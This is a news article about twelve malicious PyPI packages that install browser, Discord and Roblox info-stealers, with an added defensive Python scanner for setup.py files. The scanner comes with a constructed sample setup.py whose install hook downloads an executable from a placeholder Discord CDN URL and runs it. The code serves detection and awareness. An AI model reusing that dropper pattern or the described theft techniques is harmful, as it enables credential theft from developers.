A dozen malicious PyPI packages have been discovered installing malware that modifies the Discord client into an information-stealing backdoor and steals data from web browsers and Roblox.
The twelve packages were uploaded to the Python Package Index (PyPI) on August 1, 2022, by a user named “scarycoder,” and discovered by researchers at Snyk.
Contrary to the common typo-squatting approach, these packages use their own names and promise various features to promote themselves to interested developers.
The Python packages pretend to be Roblox tools, thread management, and basic hacking modules, but none feature the promised functionality. Instead, the packages install password-stealing malware on developers’ devices.
Unfortunately, this malicious set of PyPI packages had not been removed from the open source package repository at the time of writing, so software developers are still at risk.
A dirty dozen
As part of a new report by Snyk, researchers analyze one of these malicious Python packages named “cyphers,” showing how malicious code hidden in the “setup.py” file is used to install two malware executables from a Discord CDN server, namely “ZYXMN.exe” and “ZYRBX.exe.”
The behavior is the same for all packages in the set, except for “hackerfilelol” and “hackerfileloll,” which use a single malicious executable named “Main.exe.”
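The install-time pattern described above (a setup.py that fetches an executable from a Discord CDN URL and runs it) can be triaged statically before a package is ever installed. The following is an added example, not code from Snyk or from the packages themselves; it walks the setup.py AST and reports the indicators a reviewer would want to see, and the sample setup.py and its placeholder URL are constructed for the demonstration.

```python
import ast
# Indicators constructed for this example: the Discord hosts the article names plus common fetch/exec calls.
DISCORD_HOSTS = ("cdn.discordapp.com", "discord.com/api/webhooks", "discordapp.com/api/webhooks")
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve", "urlopen",
               "urlretrieve", "requests.get", "requests.post"}
EXEC_CALLS = {"os.system", "os.startfile", "subprocess.Popen", "subprocess.run",
              "subprocess.call", "subprocess.check_output", "Popen", "system"}

def _dotted(node):  # 'a.b.c' for a plain name/attribute chain, '' for anything else
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""

def scan_setup_py(source):
    """Return human-readable findings for the text of a setup.py (hints for review, not a verdict)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value for h in DISCORD_HOSTS):
                findings.append(f"line {node.lineno}: Discord CDN/webhook URL {node.value!r}")
            elif node.value.lower().endswith(".exe"):
                findings.append(f"line {node.lineno}: executable file name {node.value!r}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FETCH_CALLS:
                findings.append(f"line {node.lineno}: network fetch via {name}()")
            elif name in EXEC_CALLS:
                findings.append(f"line {node.lineno}: process execution via {name}()")
            if any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: custom cmdclass hooks the install step")
    return findings

def looks_like_dropper(findings):  # fetching from the network and executing during install is the red flag
    return any("network fetch" in f for f in findings) and any("process execution" in f for f in findings)

# Constructed sample setup.py mimicking the pattern the article describes; the URL is a placeholder.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request
class PostInstall(install):
    def run(self):
        dest = os.path.join(os.environ.get("TEMP", "."), "ZYXMN.exe")
        urllib.request.urlretrieve("https://cdn.discordapp.com/attachments/PLACEHOLDER/ZYXMN.exe", dest)
        os.startfile(dest)
setup(name="cyphers", version="0.0.1", cmdclass={"install": PostInstall})
'''
```

Run `scan_setup_py` over the extracted sdist's setup.py (and any module it imports) before installing; a `cmdclass` install hook combined with a fetch-and-execute pair is the combination worth blocking in a CI gate.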
The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history.
To steal information from browsers, the malware decrypts the web browser’s local database master key to recover, in cleartext, the victim’s search history, browsing history, cookies, bookmarks, stored passwords, and stored credit cards. This information is then uploaded to the threat actors via a Discord webhook.
To steal data from Discord, the malware modifies the index.js file under the ‘discord_desktop_core’ folder to add the malicious Discord-Injection script. The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB (Public Test Build).
With the script injected, Discord will perform a variety of malicious actions once it is restarted, including stealing authentication tokens, Nitro status, billing information, and credit cards.
The second malware, ZYRBX.exe, focuses solely on Roblox, attempting to steal the account cookie, user ID, Robux balance, and account Premium status of the online gaming platform and exfiltrate it to a Discord webhook.
More malware on PyPI
Yesterday, Kaspersky published a report presenting two other PyPI packages that contain info-stealing malware and also modify the Discord client.
The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.
After this step, the stealer scans the host’s Downloads, Documents, and Desktop folders to locate 2FA recovery lists, password text files, Discord tokens, PayPal account info, and more.
The malicious duo discovered by Kaspersky are “pyquest” and “ultrarequests,” mimicking projects with millions of downloads and even cloning their code.
PyPI’s response to malicious package reports appears to be slow, with malicious packages remaining online for days after being reported. This is likely the result of a small team of volunteers with a limited budget being overwhelmed by constant malware uploads.
Unfortunately, this gives more uptime to the malicious packages and increases the chances of software developers becoming victims of this malware.